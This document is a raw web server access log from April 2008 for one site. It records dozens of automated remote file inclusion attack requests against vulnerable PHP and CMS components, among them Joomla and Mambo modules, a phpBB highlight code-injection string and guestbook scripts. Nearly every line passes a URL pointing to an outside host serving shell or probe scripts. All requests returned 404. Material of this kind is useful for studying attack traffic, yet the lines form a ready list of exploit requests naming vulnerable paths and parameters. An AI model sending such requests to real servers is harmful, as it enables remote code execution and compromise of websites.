210.118.170.87 - - [01/Apr/2008:03:38:05 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
89.108.64.200 - - [01/Apr/2008:03:38:08 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.64.200 - - [01/Apr/2008:03:38:09 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:03:39:38 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geocities.com/putraaja_85/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:03:39:39 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geocities.com/putraaja_85/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:03:39:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geocities.com/putraaja_85/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:03:40:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.108.66.169 - - [01/Apr/2008:03:40:06 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.169 - - [01/Apr/2008:03:40:06 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.52.27.146 - - [01/Apr/2008:03:41:17 -0700] "GET /logs/affichearticles.php3?newsenginedir=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
74.52.27.146 - - [01/Apr/2008:03:41:19 -0700] "GET /affichearticles.php3?newsenginedir=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:03:41:30 -0700] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.visionnoir.com/newsreport/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:03:41:31 -0700] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:03:41:32 -0700] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.visionnoir.com/newsreport/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:03:41:32 -0700] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:42:02 -0700] "GET /logs/access_080101.log//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:03:42:34 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:03:42:34 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:03:45:27 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:03:45:27 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
81.169.162.47 - - [01/Apr/2008:03:46:55 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
81.169.162.47 - - [01/Apr/2008:03:46:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:48:38 -0700] "GET /logs/access_080101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:48:40 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:48:40 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
89.149.195.135 - - [01/Apr/2008:03:49:46 -0700] "GET /logs/index.php?body=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
89.149.195.135 - - [01/Apr/2008:03:49:46 -0700] "GET /index.php?body=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:50:40 -0700] "GET /logs/access_080101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:50:40 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:50:40 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:03:54:00 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:03:54:01 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:03:54:01 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
61.19.248.155 - - [01/Apr/2008:03:54:59 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
61.19.248.155 - - [01/Apr/2008:03:54:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
61.19.248.155 - - [01/Apr/2008:03:55:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:03:55:27 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:03:55:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:03:55:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.113.122.205 - - [01/Apr/2008:03:56:00 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.113.122.205 - - [01/Apr/2008:03:56:04 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:03:56:23 -0700] "GET /logs/access_080101.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:03:56:34 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:03:56:35 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.212.235.131 - - [01/Apr/2008:03:56:47 -0700] "GET /logs/access_080101.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
205.234.200.223 - - [01/Apr/2008:03:56:53 -0700] "GET //config/dbutil.bck.php?confdir=http://www.redladys.net/tgp/alat/idscan2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:03:58:30 -0700] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:03:58:51 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:03:58:52 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:03:59:08 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:03:59:36 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:03:59:36 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:03:59:36 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:03:59:37 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:03:59:46 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:04:00:37 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:04:00:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:04:02:21 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.50.14.189 - - [01/Apr/2008:04:02:41 -0700] "GET /logs/access_080201.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.50.14.189 - - [01/Apr/2008:04:02:42 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.50.14.189 - - [01/Apr/2008:04:02:42 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.50.14.189 - - [01/Apr/2008:04:02:45 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:04:03:29 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:04:03:29 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:04:06:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:04:06:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:04:06:15 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
61.19.248.155 - - [01/Apr/2008:04:07:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:04:07:24 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:04:07:24 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.190.39.103 - - [01/Apr/2008:04:07:46 -0700] "GET /logs/access.log/componentscom_performsperforms.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
216.194.68.130 - - [01/Apr/2008:04:07:46 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.bsfadvisors.com"
213.190.39.103 - - [01/Apr/2008:04:07:46 -0700] "GET /componentscom_performsperforms.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.190.39.103 - - [01/Apr/2008:04:07:47 -0700] "GET /logs/componentscom_performsperforms.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:04:09:25 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:04:09:25 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:04:16:57 -0700] "GET /logs/access.log/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:04:16:57 -0700] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:04:17:52 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:04:17:53 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:04:17:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
72.29.64.142 - - [01/Apr/2008:04:18:39 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.75.39 - - [01/Apr/2008:04:18:39 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.75.39 - - [01/Apr/2008:04:18:39 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [01/Apr/2008:04:18:39 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:04:18:40 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:04:18:40 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:04:18:41 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:04:19:34 -0700] "GET /logs//include.php?path[docroot]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:04:19:34 -0700] "GET //include.php?path[docroot]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:04:20:02 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:04:20:02 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:04:20:03 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
124.51.67.46 - - [01/Apr/2008:04:20:13 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
124.51.67.46 - - [01/Apr/2008:04:20:15 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:04:20:44 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:04:20:44 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:04:20:45 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:04:20:46 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:04:20:46 -0700] "GET //skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:04:20:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:04:21:09 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:04:21:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:04:21:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:04:21:34 -0700] "GET /logs/access.log/services.php?page=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
